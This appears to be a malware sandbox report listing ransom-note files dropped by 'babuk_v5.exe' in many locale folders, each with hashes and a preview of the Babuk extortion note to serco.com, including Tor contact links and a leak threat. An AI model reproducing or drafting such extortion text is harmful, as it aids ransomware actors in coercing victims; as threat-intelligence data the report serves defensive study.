                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fi-FI\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-029\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-BE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-CA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-CD\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-CH\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-CI\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-CM\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-FR\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-HT\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-LU\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-MA\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-MC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-ML\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-RE\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\fr-SN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Microsoft\input\gl-ES\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
